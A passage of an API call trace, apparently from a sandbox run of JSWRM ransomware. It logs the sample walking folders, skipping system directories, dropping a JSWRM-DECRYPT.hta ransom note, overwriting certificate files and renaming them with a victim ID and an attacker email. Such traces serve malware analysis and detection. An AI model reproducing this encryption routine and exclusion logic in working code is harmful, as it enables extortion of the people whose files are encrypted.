office\\root\\office16\\groove\\certificates\\verisign\\jswrm-decrypt.hta")) returned 0x20 [0130.738] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\Verisign\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1865b8d4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4496fc1d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2494f0, cFileName=".", cAlternateFileName="")) returned 0x231e00 [0130.738] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0130.738] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1865b8d4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4496fc1d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2494f0, cFileName="..", cAlternateFileName="")) returned 1 [0130.738] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0130.738] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0130.738] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1865b8d4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2494f0, cFileName="Components", cAlternateFileName="COMPON~1")) returned 1 [0130.738] lstrcmpiW (lpString1="Components", lpString2=".") returned 1 [0130.738] lstrcmpiW (lpString1="Components", lpString2="..") returned 1 [0130.738] lstrcmpiW (lpString1="Components", lpString2="...") returned 1 [0130.738] lstrcmpiW (lpString1="Components", lpString2="windows") returned -1 [0130.738] lstrcmpiW (lpString1="Components", lpString2="recovery") returned -1 [0130.738] lstrcmpiW (lpString1="Components", lpString2="perflogs") returned -1 [0130.738] lstrcmpiW (lpString1="Components", lpString2="documents and settings") returned -1 [0130.738] lstrcmpiW (lpString1="Components", lpString2="$RECYCLE.BIN") returned 1 [0130.738] lstrcmpiW (lpString1="Components", lpString2="system volume information") returned -1 [0130.738] lstrcmpiW (lpString1="Components", lpString2="msocache") returned -1 [0130.738] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\Verisign\\Components\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\verisign\\components\\jswrm-decrypt.hta")) returned 0xffffffff [0130.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\Verisign\\Components\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\verisign\\components\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.742] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.742] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0130.743] CloseHandle (hObject=0x338) returned 1 [0130.743] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\Verisign\\Components\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\verisign\\components\\jswrm-decrypt.hta")) returned 0x20 [0130.743] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\Verisign\\Components\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1865b8d4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4496fc1d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236172, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0130.743] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0130.743] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1865b8d4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4496fc1d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236172, cFileName="..", cAlternateFileName="")) returned 1 [0130.744] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0130.744] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0130.744] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4496fc1d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4496fc1d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4496fc1d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236172, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0130.744] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0130.744] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0130.744] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0130.744] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0130.744] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0130.744] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0130.744] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0130.744] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0130.744] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0130.744] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0130.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.744] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b0f9971, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ae, dwReserved0=0x60002, dwReserved1=0x236172, cFileName="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", cAlternateFileName="VERISI~2.CER")) returned 1 [0130.744] lstrcmpiW (lpString1="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", lpString2=".") returned 1 [0130.744] lstrcmpiW (lpString1="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", lpString2="..") returned 1 [0130.744] lstrcmpiW (lpString1="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", lpString2="...") returned 1 [0130.744] lstrcmpiW (lpString1="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", lpString2="windows") returned -1 [0130.744] lstrcmpiW (lpString1="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", lpString2="recovery") returned 1 [0130.744] lstrcmpiW (lpString1="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", lpString2="perflogs") returned 1 [0130.744] lstrcmpiW (lpString1="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", lpString2="documents and settings") returned 1 [0130.744] lstrcmpiW (lpString1="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", lpString2="$RECYCLE.BIN") returned 1 [0130.744] lstrcmpiW (lpString1="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", lpString2="system volume information") returned 1 [0130.744] lstrcmpiW (lpString1="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", lpString2="msocache") returned 1 [0130.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0130.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", cchWideChar=43, lpMultiByteStr=0x22d298, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", lpUsedDefaultChar=0x0) returned 43 [0130.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0130.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", lpUsedDefaultChar=0x0) returned 43 [0130.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Code_Signing_2001-4_CA.cer" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\verisign\\components\\verisign_class_3_code_signing_2001-4_ca.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0130.746] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=942) returned 1 [0130.746] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.746] ReadFile (in: hFile=0x264, lpBuffer=0x230a00, nNumberOfBytesToRead=0x3a0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345de64*=0x3a0, lpOverlapped=0x0) returned 1 [0130.748] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.748] WriteFile (in: hFile=0x264, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345de60*=0x3a0, lpOverlapped=0x0) returned 1 [0130.748] CloseHandle (hObject=0x264) returned 1 [0130.748] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Code_Signing_2001-4_CA.cer" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\verisign\\components\\verisign_class_3_code_signing_2001-4_ca.cer"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Code_Signing_2001-4_CA.cer.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\verisign\\components\\verisign_class_3_code_signing_2001-4_ca.cer.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.749] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b0f9971, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x240, dwReserved0=0x60002, dwReserved1=0x236172, cFileName="VeriSign_Class_3_Public_Primary_CA.cer", cAlternateFileName="VERISI~1.CER")) returned 1 [0130.749] lstrcmpiW (lpString1="VeriSign_Class_3_Public_Primary_CA.cer", lpString2=".") returned 1 [0130.749] lstrcmpiW (lpString1="VeriSign_Class_3_Public_Primary_CA.cer", lpString2="..") returned 1 [0130.749] lstrcmpiW (lpString1="VeriSign_Class_3_Public_Primary_CA.cer", lpString2="...") returned 1 [0130.749] lstrcmpiW (lpString1="VeriSign_Class_3_Public_Primary_CA.cer", lpString2="windows") returned -1 [0130.749] lstrcmpiW (lpString1="VeriSign_Class_3_Public_Primary_CA.cer", lpString2="recovery") returned 1 [0130.749] lstrcmpiW (lpString1="VeriSign_Class_3_Public_Primary_CA.cer", lpString2="perflogs") returned 1 [0130.749] lstrcmpiW (lpString1="VeriSign_Class_3_Public_Primary_CA.cer", lpString2="documents and settings") returned 1 [0130.749] lstrcmpiW (lpString1="VeriSign_Class_3_Public_Primary_CA.cer", lpString2="$RECYCLE.BIN") returned 1 [0130.749] lstrcmpiW (lpString1="VeriSign_Class_3_Public_Primary_CA.cer", lpString2="system volume information") returned 1 [0130.749] lstrcmpiW (lpString1="VeriSign_Class_3_Public_Primary_CA.cer", lpString2="msocache") returned 1 [0130.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VeriSign_Class_3_Public_Primary_CA.cer", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0130.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VeriSign_Class_3_Public_Primary_CA.cer", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VeriSign_Class_3_Public_Primary_CA.cer", lpUsedDefaultChar=0x0) returned 38 [0130.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VeriSign_Class_3_Public_Primary_CA.cer", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0130.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VeriSign_Class_3_Public_Primary_CA.cer", cchWideChar=38, lpMultiByteStr=0x22d298, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VeriSign_Class_3_Public_Primary_CA.cer", lpUsedDefaultChar=0x0) returned 38 [0130.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.750] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Public_Primary_CA.cer" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\verisign\\components\\verisign_class_3_public_primary_ca.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0130.750] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=576) returned 1 [0130.750] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.751] ReadFile (in: hFile=0x264, lpBuffer=0x207860, nNumberOfBytesToRead=0x240, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x207860*, lpNumberOfBytesRead=0x345de64*=0x240, lpOverlapped=0x0) returned 1 [0130.752] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.752] WriteFile (in: hFile=0x264, lpBuffer=0x207860*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x207860*, lpNumberOfBytesWritten=0x345de60*=0x240, lpOverlapped=0x0) returned 1 [0130.752] CloseHandle (hObject=0x264) returned 1 [0130.752] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Public_Primary_CA.cer" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\verisign\\components\\verisign_class_3_public_primary_ca.cer"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Public_Primary_CA.cer.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\verisign\\components\\verisign_class_3_public_primary_ca.cer.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.753] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1865b8d4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1865b8d4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x38b, dwReserved0=0x60002, dwReserved1=0x236172, cFileName="VS_ComponentSigningIntermediate.cer", cAlternateFileName="VS_COM~1.CER")) returned 1 [0130.753] lstrcmpiW (lpString1="VS_ComponentSigningIntermediate.cer", lpString2=".") returned 1 [0130.753] lstrcmpiW (lpString1="VS_ComponentSigningIntermediate.cer", lpString2="..") returned 1 [0130.753] lstrcmpiW (lpString1="VS_ComponentSigningIntermediate.cer", lpString2="...") returned 1 [0130.753] lstrcmpiW (lpString1="VS_ComponentSigningIntermediate.cer", lpString2="windows") returned -1 [0130.753] lstrcmpiW (lpString1="VS_ComponentSigningIntermediate.cer", lpString2="recovery") returned 1 [0130.753] lstrcmpiW (lpString1="VS_ComponentSigningIntermediate.cer", lpString2="perflogs") returned 1 [0130.753] lstrcmpiW (lpString1="VS_ComponentSigningIntermediate.cer", lpString2="documents and settings") returned 1 [0130.753] lstrcmpiW (lpString1="VS_ComponentSigningIntermediate.cer", lpString2="$RECYCLE.BIN") returned 1 [0130.753] lstrcmpiW (lpString1="VS_ComponentSigningIntermediate.cer", lpString2="system volume information") returned 1 [0130.753] lstrcmpiW (lpString1="VS_ComponentSigningIntermediate.cer", lpString2="msocache") returned 1 [0130.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VS_ComponentSigningIntermediate.cer", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0130.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VS_ComponentSigningIntermediate.cer", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VS_ComponentSigningIntermediate.cer", lpUsedDefaultChar=0x0) returned 35 [0130.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VS_ComponentSigningIntermediate.cer", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0130.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VS_ComponentSigningIntermediate.cer", cchWideChar=35, lpMultiByteStr=0x22d0d8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VS_ComponentSigningIntermediate.cer", lpUsedDefaultChar=0x0) returned 35 [0130.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\Verisign\\Components\\VS_ComponentSigningIntermediate.cer" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\verisign\\components\\vs_componentsigningintermediate.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0130.754] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=907) returned 1 [0130.754] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.755] ReadFile (in: hFile=0x264, lpBuffer=0x20e550, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345de64*=0x380, lpOverlapped=0x0) returned 1 [0130.756] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.756] WriteFile (in: hFile=0x264, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345de60*=0x380, lpOverlapped=0x0) returned 1 [0130.756] CloseHandle (hObject=0x264) returned 1 [0130.756] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\Verisign\\Components\\VS_ComponentSigningIntermediate.cer" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\verisign\\components\\vs_componentsigningintermediate.cer"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\Verisign\\Components\\VS_ComponentSigningIntermediate.cer.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\verisign\\components\\vs_componentsigningintermediate.cer.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.757] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1865b8d4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1865b8d4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x38b, dwReserved0=0x60002, dwReserved1=0x236172, cFileName="VS_ComponentSigningIntermediate.cer", cAlternateFileName="VS_COM~1.CER")) returned 0 [0130.757] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0130.757] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4496fc1d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4496fc1d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, 